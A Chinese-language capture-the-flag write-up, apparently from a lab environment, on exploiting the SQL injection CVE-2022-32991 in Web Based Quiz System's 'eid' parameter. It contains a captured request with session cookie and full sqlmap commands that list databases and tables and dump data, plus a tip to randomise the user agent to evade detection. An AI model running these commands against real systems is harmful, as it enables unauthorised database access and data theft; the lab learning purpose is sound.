CVE-2022-32991Web Based Quiz System SQL注入
1. ✍内容
- 先注册账户,登进来
url处存在Sql注入
观察该页面URL,发现虽然为welcome.php,但参数并不是eid
继续查找其他页面,点击第一栏Start进行跳转:
发现存在welcome.php和eid参数
抓包一下,看下
GET /welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34 HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://eci-2zecishpaj6biqvamv9f.cloudeci1.ichunqiu.com/welcome.php?q=1
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: Hm_lvt_2d0601bd28de7d49818249cf35d95943=1712754099,1713109904; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1713109904; PHPSESSID=42nounc7hshlrd4ossghltea9t
- 几下会用的的参数
--cookie="Hm_lvt_2d0601bd28de7d49818249cf35d95943=1712754099,1713109904; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1713109904; PHPSESSID=42nounc7hshlrd4ossghltea9t"
这里使用--random-agent 取代指定--user-agent
**否则可能会被识别到明显的sqlmap客户端标识,从而导致攻击的中断。**
- 开始攻击
python sqlmap.py -u "http://eci-2zecishpaj6biqvamv9f.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34" -p "eid" --random-agent --cookie="Hm_lvt_2d0601bd28de7d49818249cf35d95943=1712754099,1713109904; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1713109904; PHPSESSID=42nounc7hshlrd4ossghltea9t" --batch --dbs
- 报表名
python sqlmap.py -u "http://eci-2zecishpaj6biqvamv9f.cloudeci1.ichunqiu.com/welcome.php?q=quiz&step=2&eid=60377db362694&n=1&t=34" -p "eid" --random-agent --cookie="Hm_lvt_2d0601bd28de7d49818249cf35d95943=1712754099,1713109904; Hm_lpvt_2d0601bd28de7d49818249cf35d95943=1713109904; PHPSESSID=42nounc7hshlrd4ossghltea9t" --batch -D "ctf" --tables
- 获取flag
- --dump
